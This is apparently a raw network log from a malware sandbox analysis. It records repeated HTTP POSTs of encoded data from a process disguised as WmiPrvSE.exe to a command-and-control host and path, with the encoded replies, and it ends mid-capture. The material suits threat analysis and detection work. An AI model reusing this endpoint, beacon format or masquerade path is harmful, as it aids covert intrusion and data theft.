Oct 27, 2024 02:42:48.376422882 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 00:42:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qLziXCIWo6Qqpbl6ly6TzYOb5nOxmr6Az%2BQOa6tb4SyyKsND0zWu5JuNRMfuLagbQb%2B%2FMc4p4O5qutafVzlTo02pargS9zKxs2caWwEUhwBpVK%2BfrfTr5tQ3mapZrpW%2BP0qqBorOiQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d8ea5f139933abf-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1083&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=669&delivery_rate=1384321&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 34 63 0d 0a 56 4a 7e 04 6c 54 7f 03 78 61 7c 00 6b 62 7f 00 7c 67 5e 50 7f 5e 5b 0c 6d 60 6c 00 7d 61 7c 4b 77 60 65 09 6d 5f 65 02 75 58 52 45 6a 61 78 01 55 4b 71 0c 60 62 77 44 7f 71 6a 5c 6b 49 7a 0c 78 48 78 0a 6a 63 63 01 62 5c 79 07 77 71 7d 00 6b 5f 54 03 6a 52 64 4e 7e 77 67 01 75 76 7b 06 7c 5c 71 04 6a 60 5b 07 6c 77 77 5d 78 74 7c 04 6f 0b 63 4b 6d 5c 7f 5b 78 73 75 5f 7c 60 74 06 7b 67 52 03 7d 4c 5d 4d 77 71 60 04 7a 51 41 5b 7c 77 5a 0d 7c 5f 79 0c 77 6c 6c 41 7b 7f 7c 05 74 5e 72 0d 79 07 65 48 7c 7c 6a 07 7a 71 7e 49 61 63 55 4a 76 4f 67 5f 77 62 62 50 7e 5d 79 5f 77 5b 7d 07 76 66 70 09 68 0a 75 01 60 6f 73 5d 7f 73 6c 01 6f 6f 7f 03 6f 5e 66 4a 7c 6d 78 08 77 49 6c 03 69 62 53 50 69 53 64 53 7b 43 75 5f 7d 62 7a 5c 7b 5d 46 51 7c 55 68 0d 69 06 68 0c 7d 67 61 5e 6f 54 74 5f 78 62 67 59 68 5f 59 49 7d 64 78 53 68 63 66 52 7a 5d 7b 5d 7e 61 78 4b 77 63 65 51 7b 5c 79 02 77 76 68 48 7d 48 7c 07 7d 76 5f 0a 74 72 77 03 7d 62 69 4c 7f 67 66 0b 79 76 5e 0a 7c 73 7b 47 76 62 7d 41 77 [TRUNCATED] Data Ascii: 54cVJ~lTxa\|kb\|g^P^[m`l}a\|Kw`em_euXREjaxUKq`bwDqj\kIzxHxjccb\ywq}k_TjRdN~wguv{\|\qj`[lww]xt\|ocKm\[xsu_\|`t{gR}L]Mwq`zQA[\|wZ\|_ywllA{\|t^ryeH\|\|jzq~IacUJvOg_wbbP~]y_w[}vfphu`os]slooo^fJ\|mxwIlibSPiSdS{Cu_}bz\{]FQ\|Uhih}ga^oTt_xbgYh_YI}dxShcfRz]{]~axKwceQ{\ywvhH}H\|}v_trw}biLgfyv^\|s{Gvb}AwaSH\|_P}ld}wwuq{x\u}`}I{whxw\|MxSYxbdHxcPO`tIxId~LQwqV~\|wH\|Yp}qavR\|N{\|ht^fAyO}~\|rx_zvc]vaxvqb~`TtLmOwu
Oct 27, 2024 02:42:48.376476049 CEST	909	IN	Data Raw: 5a 42 7e 6c 53 06 74 42 70 4d 7f 5d 78 00 78 7c 55 45 7a 60 7a 01 7d 7d 7c 4e 74 49 52 04 7e 62 76 08 7d 7d 55 08 7b 7d 54 05 7d 5c 71 02 7c 70 7c 0c 7c 52 70 40 7d 60 74 0a 7d 67 72 4d 7b 43 77 07 78 5c 78 05 7c 61 6b 02 7d 49 7b 0a 7f 4e 71 0b Data Ascii: ZB~lStBpM]xx\|UEz`z}}\|NtIR~bv}}U{}T}\q\|p\|\|Rp@}`t}grM{Cwx\x\|ak}I{NqyMx}LRwMy{aawfZ~v\|M}vyvr}bq\|IPCxvl}cwJvbywamHav}ltC~YQJu_cxLa~^iyg\|xIRLy}Uyblx]v{]NZoYp}bZ^vrs[}l]E^xXq@alpz\|hwp_UyanY\|\|~_z\yvxBagx[

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49752	188.114.96.3	80	3120	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 02:43:00.580704927 CEST	320	OUT	POST /jscpuGamegeneratorprivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 304773cm.n9shteam.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 27, 2024 02:43:00.937201023 CEST	344	OUT	Data Raw: 00 03 04 07 06 0c 01 0b 05 06 02 01 02 07 01 06 00 06 05 0b 02 01 03 09 07 05 0f 54 06 01 00 02 0d 51 03 0d 07 04 06 04 0d 07 05 06 07 01 06 03 07 02 0b 0a 0d 00 06 56 07 57 05 07 06 02 06 00 02 51 0d 09 05 52 06 55 0e 05 0f 07 0d 07 0b 09 06 04 Data Ascii: TQVWQRU\L}U^TMtb_Bb[cT\|ob\w\|RhM]ZoUg{^~kShwY\}u~V@A{mbL~bu
Oct 27, 2024 02:43:01.169492960 CEST	25	IN	HTTP/1.1 100 Continue
Oct 27, 2024 02:43:01.479398012 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 00:43:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nbn%2FpXgpvGtfb5FsN1aOGcJwFEv98eRJtzbePxHyIFrmSVJYSXte1PmCmCtY08eRKSMNbLr7uUfwzJRKfJYUPxUITQzrzt8wZ6zXhvBuwLYFzH1IwUXrh2QpziR02SoCtlXrw5zFlQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d8ea643ff344785-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2405&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=664&delivery_rate=639293&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 34 63 0d 0a 56 4a 7e 01 6c 43 63 06 79 61 6b 5b 6b 61 77 07 69 77 6f 0a 6b 5e 7d 40 6d 63 74 06 6a 5c 59 5d 74 5d 75 40 7a 5f 69 44 76 76 56 07 7e 5b 78 01 55 4b 71 0c 60 62 77 44 7f 71 6a 5c 6b 49 7a 0c 78 48 78 0a 6a 63 63 01 62 5c 79 07 77 71 7d 00 6b 5f 54 03 6a 52 64 4e 7e 77 67 01 75 76 7b 06 7c 5c 5c 5b 7d 4e 79 01 6c 64 60 04 6f 49 5e 42 7b 6d 7f 00 79 4c 56 48 6c 5d 5c 41 7d 60 60 02 7b 64 73 5e 7e 71 6f 02 76 5f 78 05 7a 51 41 5b 7c 77 5a 0d 7c 5f 79 0c 77 6c 6c 41 7b 7f 7c 05 74 5e 72 0d 79 07 65 48 7c 7c 6a 07 7a 71 7e 49 61 63 55 4a 76 4f 67 5f 77 62 62 50 7e 5d 79 5f 77 5b 7d 07 76 66 70 09 68 0a 75 01 60 6f 73 5d 7f 73 6c 01 6f 6f 7f 03 6f 5e 66 4a 7c 6d 78 08 77 49 6c 03 69 62 53 50 69 53 64 53 7b 43 75 5f 7d 62 7a 5c 7b 5d 46 51 7c 55 68 0d 69 06 68 0c 7d 67 61 5e 6f 54 74 5f 78 62 67 59 68 5f 59 49 7d 64 78 53 68 63 66 52 7a 5d 7b 5d 7e 61 78 4b 77 63 65 51 7b 5c 79 02 77 76 68 48 7d 48 7c 07 7d 76 5f 0a 74 72 77 03 7d 62 69 4c 7f 67 66 0b 79 76 5e 0a 7c 73 7b 47 76 62 7d 41 77 [TRUNCATED] Data Ascii: 54cVJ~lCcyak[kawiwok^}@mctj\Y]t]u@z_iDvvV~[xUKq`bwDqj\kIzxHxjccb\ywq}k_TjRdN~wguv{\|\\[}Nyld`oI^B{myLVHl]\A}``{ds^~qov_xzQA[\|wZ\|_ywllA{\|t^ryeH\|\|jzq~IacUJvOg_wbbP~]y_w[}vfphu`os]slooo^fJ\|mxwIlibSPiSdS{Cu_}bz\{]FQ\|Uhih}ga^oTt_xbgYh_YI}dxShcfRz]{]~axKwceQ{\ywvhH}H\|}v_trw}biLgfyv^\|s{Gvb}AwaSH\|_P}ld}wwuq{x\u}`}I{whxw\|MxSYxbdHxcPO`tIxId~LQwqV~\|wH\|Yp}qavR\|N{\|ht^fAyO}~\|rx_zvc]vaxvqb~`TtLmOwuZB~lStBp
Oct 27, 2024 02:43:01.479444027 CEST	900	IN	Data Raw: 4d 7f 5d 78 00 78 7c 55 45 7a 60 7a 01 7d 7d 7c 4e 74 49 52 04 7e 62 76 08 7d 7d 55 08 7b 7d 54 05 7d 5c 71 02 7c 70 7c 0c 7c 52 70 40 7d 60 74 0a 7d 67 72 4d 7b 43 77 07 78 5c 78 05 7c 61 6b 02 7d 49 7b 0a 7f 4e 71 0b 79 4d 78 07 7d 4c 52 00 77 Data Ascii: M]xx\|UEz`z}}\|NtIR~bv}}U{}T}\q\|p\|\|Rp@}`t}grM{Cwx\x\|ak}I{NqyMx}LRwMy{aawfZ~v\|M}vyvr}bq\|IPCxvl}cwJvbywamHav}ltC~YQJu_cxLa~^iyg\|xIRLy}Uyblx]v{]NZoYp}bZ^vrs[}l]E^xXq@alpz\|hwp_UyanY\|\|~_z\yvxBagx[L~Jx^W\`\

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49807	188.114.96.3	80	7536	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 02:43:10.495507956 CEST	320	OUT	POST /jscpuGamegeneratorprivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 304773cm.n9shteam.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 27, 2024 02:43:10.843298912 CEST	344	OUT	Data Raw: 05 02 01 06 03 0f 01 04 05 06 02 01 02 04 01 0b 00 07 05 0f 02 07 03 0c 00 02 0d 07 04 50 01 57 0a 01 03 0d 02 56 06 07 0e 06 04 06 05 56 04 04 06 53 0b 0b 0a 03 04 0a 04 02 07 54 06 05 05 0f 01 02 0f 5d 00 02 05 06 0e 0e 0c 0f 0d 03 0c 02 07 03 Data Ascii: PWVVST]]WWVW\L}UNvt[}Ove{PU~]`lRB~ppKxl]Ko^aYhShwIs]~_~V@@z}f}La
Oct 27, 2024 02:43:11.099488020 CEST	25	IN	HTTP/1.1 100 Continue
Oct 27, 2024 02:43:11.310797930 CEST	25	IN	HTTP/1.1 100 Continue
Oct 27, 2024 02:43:11.411142111 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 00:43:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AWyYd%2FvfpGIleyOlnf5GC1dBolQ%2Btd%2BXb6lO8BvR5S95FjXBDQxueUQrh6o4pP5Fqnsh4EdjVZgtI2fhgQFhNsIXL3wYhauCLGt0b8QjBvpGnD%2Fa28aaWH%2F9RC%2Bc1hUdHQTcxhpw0w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d8ea681fcc5485c-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1301&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=664&delivery_rate=1131250&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 34 63 0d 0a 56 4a 7d 59 78 6e 63 07 7b 5b 6b 5b 7c 4f 63 00 69 67 67 4f 68 5e 65 0b 6e 63 68 05 69 5b 7f 58 63 5d 71 0b 79 62 62 5a 76 75 78 48 7d 71 78 01 55 4b 71 0c 60 62 77 44 7f 71 6a 5c 6b 49 7a 0c 78 48 78 0a 6a 63 63 01 62 5c 79 07 77 71 7d 00 6b 5f 54 03 6a 52 64 4e 7e 77 67 01 75 76 7b 06 7c 5c 75 03 7e 5e 75 06 7b 77 5e 4c 6f 59 5e 4f 78 53 68 5b 79 71 70 04 7a 63 72 03 7f 73 73 58 6c 67 59 5b 7c 61 7f 03 75 07 64 03 7a 51 41 5b 7c 77 5a 0d 7c 5f 79 0c 77 6c 6c 41 7b 7f 7c 05 74 5e 72 0d 79 07 65 48 7c 7c 6a 07 7a 71 7e 49 61 63 55 4a 76 4f 67 5f 77 62 62 50 7e 5d 79 5f 77 5b 7d 07 76 66 70 09 68 0a 75 01 60 6f 73 5d 7f 73 6c 01 6f 6f 7f 03 6f 5e 66 4a 7c 6d 78 08 77 49 6c 03 69 62 53 50 69 53 64 53 7b 43 75 5f 7d 62 7a 5c 7b 5d 46 51 7c 55 68 0d 69 06 68 0c 7d 67 61 5e 6f 54 74 5f 78 62 67 59 68 5f 59 49 7d 64 78 53 68 63 66 52 7a 5d 7b 5d 7e 61 78 4b 77 63 65 51 7b 5c 79 02 77 76 68 48 7d 48 7c 07 7d 76 5f 0a 74 72 77 03 7d 62 69 4c 7f 67 66 0b 79 76 5e 0a 7c 73 7b 47 76 62 7d 41 77 [TRUNCATED] Data Ascii: 54cVJ}Yxnc{[k[\|OciggOh^enchi[Xc]qybbZvuxH}qxUKq`bwDqj\kIzxHxjccb\ywq}k_TjRdN~wguv{\|\u~^u{w^LoY^OxSh[yqpzcrssXlgY[\|audzQA[\|wZ\|_ywllA{\|t^ryeH\|\|jzq~IacUJvOg_wbbP~]y_w[}vfphu`os]slooo^fJ\|mxwIlibSPiSdS{Cu_}bz\{]FQ\|Uhih}ga^oTt_xbgYh_YI}dxShcfRz]{]~axKwceQ{\ywvhH}H\|}v_trw}biLgfyv^\|s{Gvb}AwaSH\|_P}ld}wwuq{x\u}`}I{whxw\|MxSYxbdHxcPO`tIxId~LQwqV~\|wH\|Yp}qavR\|N{\|ht^fAyO}~\|rx_zvc]vaxvqb~`TtLmO
Oct 27, 2024 02:43:11.411185026 CEST	911	IN	Data Raw: 77 75 5a 42 7e 6c 53 06 74 42 70 4d 7f 5d 78 00 78 7c 55 45 7a 60 7a 01 7d 7d 7c 4e 74 49 52 04 7e 62 76 08 7d 7d 55 08 7b 7d 54 05 7d 5c 71 02 7c 70 7c 0c 7c 52 70 40 7d 60 74 0a 7d 67 72 4d 7b 43 77 07 78 5c 78 05 7c 61 6b 02 7d 49 7b 0a 7f 4e Data Ascii: wuZB~lStBpM]xx\|UEz`z}}\|NtIR~bv}}U{}T}\q\|p\|\|Rp@}`t}grM{Cwx\x\|ak}I{NqyMx}LRwMy{aawfZ~v\|M}vyvr}bq\|IPCxvl}cwJvbywamHav}ltC~YQJu_cxLa~^iyg\|xIRLy}Uyblx]v{]NZoYp}bZ^vrs[}l]E^xXq@alpz\|hwp_UyanY\|\|~_z\yvxBag

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49883	188.114.96.3	80	3620	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 02:43:24.045061111 CEST	320	OUT	POST /jscpuGamegeneratorprivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 304773cm.n9shteam.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 27, 2024 02:43:24.390295982 CEST	344	OUT	Data Raw: 00 01 01 07 06 08 01 02 05 06 02 01 02 06 01 00 00 0b 05 0b 02 03 03 08 01 06 0f 51 06 05 06 04 0d 56 03 0e 02 57 04 0b 0b 0a 04 05 07 07 05 02 06 06 0c 59 0a 01 06 05 05 0f 05 05 04 07 07 0c 01 53 0e 0f 07 54 05 05 0c 50 0f 01 0a 00 0c 07 05 06 Data Ascii: QVWYSTPWR\L~\|btrmvuRB~zYv`hZtKxox_l`u[hnhcgpiO~V@BxCPL~Lq
Oct 27, 2024 02:43:24.644598007 CEST	25	IN	HTTP/1.1 100 Continue
Oct 27, 2024 02:43:24.971951008 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 00:43:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1KjlhTvPbrVAaTrKh7VdkSdt%2BD2q%2FvHq0AHZpGs9PbHGaVrDRXmql3PFqcpx9iEBRIq0JQaujG5UWvDktbpzWS6h1FnU%2FE1ULqgiO6hqXtUY3LUPiiWOEQ1fsdIG6GURqYQvFR3abA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d8ea6d6a9c6144b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1229&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=664&delivery_rate=1236549&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 34 63 0d 0a 56 4a 7d 5e 7b 7d 5e 5b 7b 62 5a 02 7f 07 6b 49 69 59 5d 4f 7f 60 79 41 6e 63 68 01 69 5c 60 49 63 5d 72 52 7a 5f 75 07 76 58 7f 5a 7d 71 78 01 55 4b 71 0c 60 62 77 44 7f 71 6a 5c 6b 49 7a 0c 78 48 78 0a 6a 63 63 01 62 5c 79 07 77 71 7d 00 6b 5f 54 03 6a 52 64 4e 7e 77 67 01 75 76 7b 06 7c 5b 76 5b 7e 5e 5b 02 78 01 6b 5e 6c 77 5a 4d 7b 7d 68 58 6d 71 6f 5d 6c 05 6e 04 7c 5e 74 00 78 5e 67 5b 7e 5b 67 07 76 4f 64 03 7a 51 41 5b 7c 77 5a 0d 7c 5f 79 0c 77 6c 6c 41 7b 7f 7c 05 74 5e 72 0d 79 07 65 48 7c 7c 6a 07 7a 71 7e 49 61 63 55 4a 76 4f 67 5f 77 62 62 50 7e 5d 79 5f 77 5b 7d 07 76 66 70 09 68 0a 75 01 60 6f 73 5d 7f 73 6c 01 6f 6f 7f 03 6f 5e 66 4a 7c 6d 78 08 77 49 6c 03 69 62 53 50 69 53 64 53 7b 43 75 5f 7d 62 7a 5c 7b 5d 46 51 7c 55 68 0d 69 06 68 0c 7d 67 61 5e 6f 54 74 5f 78 62 67 59 68 5f 59 49 7d 64 78 53 68 63 66 52 7a 5d 7b 5d 7e 61 78 4b 77 63 65 51 7b 5c 79 02 77 76 68 48 7d 48 7c 07 7d 76 5f 0a 74 72 77 03 7d 62 69 4c 7f 67 66 0b 79 76 5e 0a 7c 73 7b 47 76 62 7d 41 77 [TRUNCATED] Data Ascii: 54cVJ}^{}^[{bZkIiY]O`yAnchi\`Ic]rRz_uvXZ}qxUKq`bwDqj\kIzxHxjccb\ywq}k_TjRdN~wguv{\|[v[~^[xk^lwZM{}hXmqo]ln\|^tx^g[~[gvOdzQA[\|wZ\|_ywllA{\|t^ryeH\|\|jzq~IacUJvOg_wbbP~]y_w[}vfphu`os]slooo^fJ\|mxwIlibSPiSdS{Cu_}bz\{]FQ\|Uhih}ga^oTt_xbgYh_YI}dxShcfRz]{]~axKwceQ{\ywvhH}H\|}v_trw}biLgfyv^\|s{Gvb}AwaSH\|_P}ld}wwuq{x\u}`}I{whxw\|MxSYxbdHxcPO`tIxId~LQwqV~\|wH\|Yp}qavR\|N{\|ht^fAyO}~\|rx_zvc]vaxvqb~`TtLmOwuZB~l
Oct 27, 2024 02:43:24.971995115 CEST	905	IN	Data Raw: 53 06 74 42 70 4d 7f 5d 78 00 78 7c 55 45 7a 60 7a 01 7d 7d 7c 4e 74 49 52 04 7e 62 76 08 7d 7d 55 08 7b 7d 54 05 7d 5c 71 02 7c 70 7c 0c 7c 52 70 40 7d 60 74 0a 7d 67 72 4d 7b 43 77 07 78 5c 78 05 7c 61 6b 02 7d 49 7b 0a 7f 4e 71 0b 79 4d 78 07 Data Ascii: StBpM]xx\|UEz`z}}\|NtIR~bv}}U{}T}\q\|p\|\|Rp@}`t}grM{Cwx\x\|ak}I{NqyMx}LRwMy{aawfZ~v\|M}vyvr}bq\|IPCxvl}cwJvbywamHav}ltC~YQJu_cxLa~^iyg\|xIRLy}Uyblx]v{]NZoYp}bZ^vrs[}l]E^xXq@alpz\|hwp_UyanY\|\|~_z\yvxBagx[L~Jx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49958	188.114.96.3	80	4180	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 02:43:37.106426001 CEST	284	OUT	POST /jscpuGamegeneratorprivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 304773cm.n9shteam.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 27, 2024 02:43:37.453020096 CEST	344	OUT	Data Raw: 00 00 04 06 06 08 01 04 05 06 02 01 02 02 01 05 00 03 05 0b 02 04 03 0b 03 02 0e 05 04 53 00 05 0f 0f 04 01 07 02 03 05 0e 0a 06 03 06 06 04 06 04 07 0e 5b 0c 01 06 07 05 02 04 00 05 52 05 58 02 04 0f 0e 04 00 06 54 0c 00 0f 04 0e 03 0c 06 02 01 Data Ascii: S[RXTTUP\L~A`XNvbT\a[oU\|Sw\|ZL\|s^Kooc{YzkS\|AwYU[~u~V@{SvL}r}
Oct 27, 2024 02:43:37.709683895 CEST	25	IN	HTTP/1.1 100 Continue
Oct 27, 2024 02:43:38.035645962 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 00:43:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ksZgl%2FZn6lSZ49QLD3pFgTADqNl6LydE7cGMn5LbPJP0TK7DPSAmmOe6p%2Fvh8LJuQhaShMnSUfxoW5t%2FfvQQYhXh9OSGTG2bKkXxtkegd57lgZkGmVMy3yr5s9q7tOWRvN5REF8xMg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d8ea72849856c1a-DFW alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=1151&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=628&delivery_rate=1281415&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 34 63 0d 0a 56 4a 7e 4e 6c 0b 74 5f 6f 4c 78 49 68 58 6b 00 7e 5e 6f 0d 7c 4e 7d 0c 7b 63 5a 01 69 62 51 58 77 5a 65 42 6e 5f 66 5e 61 00 60 06 6a 61 78 01 55 4b 71 0c 60 62 77 44 7f 71 6a 5c 6b 49 7a 0c 78 48 78 0a 6a 63 63 01 62 5c 79 07 77 71 7d 00 6b 5f 54 03 6a 52 64 4e 7e 77 67 01 75 76 7b 06 7c 5c 71 03 6a 5e 5b 44 79 67 55 5e 78 49 55 5f 6c 54 64 59 7a 5c 5e 00 7a 70 79 5b 7c 4e 70 01 7b 67 6f 5b 6a 5b 6c 5a 77 62 64 48 7a 51 41 5b 7c 77 5a 0d 7c 5f 79 0c 77 6c 6c 41 7b 7f 7c 05 74 5e 72 0d 79 07 65 48 7c 7c 6a 07 7a 71 7e 49 61 63 55 4a 76 4f 67 5f 77 62 62 50 7e 5d 79 5f 77 5b 7d 07 76 66 70 09 68 0a 75 01 60 6f 73 5d 7f 73 6c 01 6f 6f 7f 03 6f 5e 66 4a 7c 6d 78 08 77 49 6c 03 69 62 53 50 69 53 64 53 7b 43 75 5f 7d 62 7a 5c 7b 5d 46 51 7c 55 68 0d 69 06 68 0c 7d 67 61 5e 6f 54 74 5f 78 62 67 59 68 5f 59 49 7d 64 78 53 68 63 66 52 7a 5d 7b 5d 7e 61 78 4b 77 63 65 51 7b 5c 79 02 77 76 68 48 7d 48 7c 07 7d 76 5f 0a 74 72 77 03 7d 62 69 4c 7f 67 66 0b 79 76 5e 0a 7c 73 7b 47 76 62 7d 41 77 [TRUNCATED] Data Ascii: 54cVJ~Nlt_oLxIhXk~^o\|N}{cZibQXwZeBn_f^a`jaxUKq`bwDqj\kIzxHxjccb\ywq}k_TjRdN~wguv{\|\qj^[DygU^xIU_lTdYz\^zpy[\|Np{go[j[lZwbdHzQA[\|wZ\|_ywllA{\|t^ryeH\|\|jzq~IacUJvOg_wbbP~]y_w[}vfphu`os]slooo^fJ\|mxwIlibSPiSdS{Cu_}bz\{]FQ\|Uhih}ga^oTt_xbgYh_YI}dxShcfRz]{]~axKwceQ{\ywvhH}H\|}v_trw}biLgfyv^\|s{Gvb}AwaSH\|_P}ld}wwuq{x\u}`}I{whxw\|MxSYxbdHxcPO`tIxId~LQwqV~\|wH\|Yp}qavR\|N{\|ht^fAyO}~\|rx_zvc]vaxvqb~`TtLmOwuZB~lSt
Oct 27, 2024 02:43:38.035754919 CEST	902	IN	Data Raw: 42 70 4d 7f 5d 78 00 78 7c 55 45 7a 60 7a 01 7d 7d 7c 4e 74 49 52 04 7e 62 76 08 7d 7d 55 08 7b 7d 54 05 7d 5c 71 02 7c 70 7c 0c 7c 52 70 40 7d 60 74 0a 7d 67 72 4d 7b 43 77 07 78 5c 78 05 7c 61 6b 02 7d 49 7b 0a 7f 4e 71 0b 79 4d 78 07 7d 4c 52 Data Ascii: BpM]xx\|UEz`z}}\|NtIR~bv}}U{}T}\q\|p\|\|Rp@}`t}grM{Cwx\x\|ak}I{NqyMx}LRwMy{aawfZ~v\|M}vyvr}bq\|IPCxvl}cwJvbywamHav}ltC~YQJu_cxLa~^iyg\|xIRLy}Uyblx]v{]NZoYp}bZ^vrs[}l]E^xXq@alpz\|hwp_UyanY\|\|~_z\yvxBagx[L~Jx^W\

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	50010	188.114.96.3	80	7892	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 02:43:47.470383883 CEST	272	OUT	POST /jscpuGamegeneratorprivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 304773cm.n9shteam.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 27, 2024 02:43:47.827831030 CEST	344	OUT	Data Raw: 00 0b 01 06 03 0d 04 00 05 06 02 01 02 07 01 04 00 07 05 0c 02 07 03 0d 07 05 0a 07 04 05 02 05 0e 03 03 0d 00 02 03 05 0d 53 07 00 06 05 04 0f 05 0a 0d 01 0f 55 06 00 04 54 05 0d 04 57 05 0c 03 04 0d 0b 06 03 07 05 0b 0f 0e 52 0d 51 0d 00 02 0c Data Ascii: SUTWRQPR\L~kc~trv_uKUTkRqwBw]\|ZpxUsx`eXklcd\|L}u~V@A{Cf}Le
Oct 27, 2024 02:43:48.066690922 CEST	25	IN	HTTP/1.1 100 Continue
Oct 27, 2024 02:43:48.271105051 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 00:43:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FsmyoqRIngTxABfIuXx2MmVTAMFqPeKVXX%2BefgIjY2JE50nHBd8qinAQ49Rh32NSKEb4Y7GIsla46cKcyn%2FpW34yA8RPAIwtYMzEO%2BFNwifhExV6ZDTi4FtEKcB45FYGaRCWWXVeuA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d8ea76909ae460b-DFW alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=1744&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=616&delivery_rate=840882&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 34 63 0d 0a 56 4a 7d 58 6c 53 56 5f 78 61 7c 03 7f 71 73 01 6a 49 63 0b 7f 59 66 55 79 5a 6b 5f 7d 4c 6c 03 63 60 61 4f 7b 61 7a 5b 75 58 70 4b 69 61 78 01 55 